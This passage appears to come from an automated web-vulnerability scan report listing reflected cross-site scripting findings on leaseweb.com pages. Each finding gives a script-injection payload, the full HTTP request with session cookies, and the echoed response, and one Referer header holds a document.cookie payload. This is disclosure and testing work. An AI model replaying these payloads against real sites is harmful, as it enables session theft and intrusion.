<a class="en_link" href="/flash/lsw_banner_hp.swfea376"><script>alert(1)</script>0945beb5808">
...[SNIP]...
4.88. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /flash/lsw_product.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b30d3"><script>alert(1)</script>f39597e52b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flashb30d3"><script>alert(1)</script>f39597e52b9/lsw_product.swf HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:55 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/flashb30d3"><script>alert(1)</script>f39597e52b9/lsw_product.swf">
...[SNIP]...
4.89. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /flash/lsw_product.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e2b6"><script>alert(1)</script>bd542982b78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash/lsw_product.swf9e2b6"><script>alert(1)</script>bd542982b78 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:39:12 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/flash/lsw_product.swf9e2b6"><script>alert(1)</script>bd542982b78">
...[SNIP]...
4.90. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 321fb"><script>alert(1)</script>fd4b24958c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images321fb"><script>alert(1)</script>fd4b24958c2/lsw2/favicon.ico HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:46 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images321fb"><script>alert(1)</script>fd4b24958c2/lsw2/favicon.ico">
...[SNIP]...
4.91. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf012"><script>alert(1)</script>a0a86f7335c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/lsw2cf012"><script>alert(1)</script>a0a86f7335c/favicon.ico HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:39:03 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images/lsw2cf012"><script>alert(1)</script>a0a86f7335c/favicon.ico">
...[SNIP]...
4.92. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd59"><script>alert(1)</script>60937a1f16e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/lsw2/favicon.ico8cd59"><script>alert(1)</script>60937a1f16e HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:40:31 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images/lsw2/favicon.ico8cd59"><script>alert(1)</script>60937a1f16e">
...[SNIP]...
4.93. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/maatwerk-oplossingen/private-cloud

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85608"><script>alert(1)</script>49ae32a0dad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl85608"><script>alert(1)</script>49ae32a0dad/maatwerk-oplossingen/private-cloud HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/nl/over-ons/klanten
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; symfony=daf9a023172501d53f64bf1ec4e87cf6; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.2.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:27 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/nl85608"><script>alert(1)</script>49ae32a0dad/maatwerk-oplossingen/private-cloud">
...[SNIP]...
4.94. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/maatwerk-oplossingen/private-cloud

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d26"><script>alert(1)</script>f0849897138 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl/maatwerk-oplossingen19d26"><script>alert(1)</script>f0849897138/private-cloud HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/nl/over-ons/klanten
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; symfony=daf9a023172501d53f64bf1ec4e87cf6; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.2.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:43 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/maatwerk-oplossingen19d26"><script>alert(1)</script>f0849897138/private-cloud">
...[SNIP]...
4.95. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/maatwerk-oplossingen/private-cloud

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e42f6"><script>alert(1)</script>2b6bf11932d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl/maatwerk-oplossingen/private-cloude42f6"><script>alert(1)</script>2b6bf11932d HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/nl/over-ons/klanten
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; symfony=daf9a023172501d53f64bf1ec4e87cf6; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.2.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:59 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/maatwerk-oplossingen/private-cloude42f6"><script>alert(1)</script>2b6bf11932d">
...[SNIP]...
4.96. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/over-ons/klanten

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a3e1"><script>alert(1)</script>18e3622a63c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl7a3e1"><script>alert(1)</script>18e3622a63c/over-ons/klanten HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en940ec%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2071b7b58a0/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.1.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:13 GMT
Server: Apache
Set-Cookie: symfony=6f2b6d9835f2cf7fd2b420816381f379; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/nl7a3e1"><script>alert(1)</script>18e3622a63c/over-ons/klanten">
...[SNIP]...
4.97. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/over-ons/klanten

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46ebb"><script>alert(1)</script>787952ee632 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl/over-ons46ebb"><script>alert(1)</script>787952ee632/klanten HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en940ec%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2071b7b58a0/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.1.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:29 GMT
Server: Apache
Set-Cookie: symfony=69b485cc115be701209de00212f50ba9; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/over-ons46ebb"><script>alert(1)</script>787952ee632/klanten">
...[SNIP]...
4.98. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /nl/over-ons/klanten

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e841d"><script>alert(1)</script>319b87847a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nl/over-ons/klantene841d"><script>alert(1)</script>319b87847a7 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en940ec%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2071b7b58a0/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.1.10.1303149626

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:05:45 GMT
Server: Apache
Set-Cookie: symfony=c8c6078cfaeb9cba2fdbee29f9c6f7a2; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/over-ons/klantene841d"><script>alert(1)</script>319b87847a7">
...[SNIP]...
4.99. http://www.leaseweb.com/osdd.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /osdd.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41aa3"><script>alert(1)</script>dcb5ba34b31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /osdd.xml41aa3"><script>alert(1)</script>dcb5ba34b31 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:02 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/osdd.xml41aa3"><script>alert(1)</script>dcb5ba34b31">
...[SNIP]...
4.100. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /xml/lsw_en_bannerhome.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3b9"><script>alert(1)</script>558b59adc2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xml7c3b9"><script>alert(1)</script>558b59adc2f/lsw_en_bannerhome.xml HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/flash/lsw_banner_hp.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:00 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/xml7c3b9"><script>alert(1)</script>558b59adc2f/lsw_en_bannerhome.xml">
...[SNIP]...
4.101. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /xml/lsw_en_bannerhome.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e32b9"><script>alert(1)</script>82fe5f5c908 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xml/lsw_en_bannerhome.xmle32b9"><script>alert(1)</script>82fe5f5c908 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/flash/lsw_banner_hp.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:55 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/xml/lsw_en_bannerhome.xmle32b9"><script>alert(1)</script>82fe5f5c908">
...[SNIP]...
4.102. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24624"><script>alert(1)</script>111afbe26a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en24624"><script>alert(1)</script>111afbe26a9/shopping-cart HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:15:07 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en24624"><script>alert(1)</script>111afbe26a9/shopping-cart">
...[SNIP]...
4.103. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart

Issue detail

